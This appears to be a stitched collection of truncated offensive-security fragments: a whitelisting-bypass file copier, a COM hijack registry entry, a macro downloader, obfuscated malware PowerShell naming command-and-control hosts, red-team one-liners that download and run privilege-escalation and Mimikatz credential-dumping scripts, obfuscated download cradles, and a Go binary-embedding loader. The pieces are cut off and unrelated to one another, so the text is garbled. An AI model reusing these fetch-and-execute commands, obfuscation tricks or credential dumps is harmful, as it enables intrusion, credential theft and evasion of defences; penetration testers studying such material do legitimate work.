s1im3r00

function Copy-AuthenticodeSignedFile {
<#
.SYNOPSIS

Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.

.DESCRIPTION

Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.

s1im3r00

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

s1im3r00

Function New-WPFMessageBox {

    # For examples for use, see my blog:
    # https://smsagent.wordpress.com/2017/08/24/a-customisable-wpf-messagebox-for-powershell/
    
    # CHANGES
    # 2017-09-11 - Added some required assemblies in the dynamic parameters to avoid errors when run from the PS console host.
    
    # Define Parameters
    [CmdletBinding()]

s1im3r00

format binary as 'exe'
IMAGE_DOS_SIGNATURE	equ 5A4Dh
IMAGE_NT_SIGNATURE	equ 00004550h
PROCESSOR_AMD_X8664	equ 8664h
IMAGE_SCN_CNT_CODE	equ 00000020h
IMAGE_SCN_MEM_READ	equ 40000000h
IMAGE_SCN_MEM_WRITE	equ 80000000h
IMAGE_SCN_CNT_INITIALIZED_DATA	equ 00000040h
IMAGE_SUBSYSTEM_WINDOWS_GUI equ 2
IMAGE_NT_OPTIONAL_HDR64_MAGIC	equ 20Bh

s1im3r00

function test
{

[CmdletBinding()]
Param(
    [Parameter(Position = 0, Mandatory = $true)]
    [ValidateNotNullOrEmpty()]
    [Byte[]]
    $PEBytes,
	

s1im3r00

' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' powashell.csproj by @SubTee
' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0

Sub Document_Open()
Dim WinHttpReq As Object
Dim oStream As Object
Dim myURL As String

s1im3r00

$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215'))
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub')
foreach($t in $se)
{
        $pin=teSt-`Co`NNec`TIoN $t
        if ($pin -ne $null)
        {
                $nic=$t
                break
        }

s1im3r00

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

s1im3r00

Download Cradles

0) Extra goodies

• Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:

$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''

• The same as above but for UTF-16 base64 encoded strings:

s1im3r00

package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder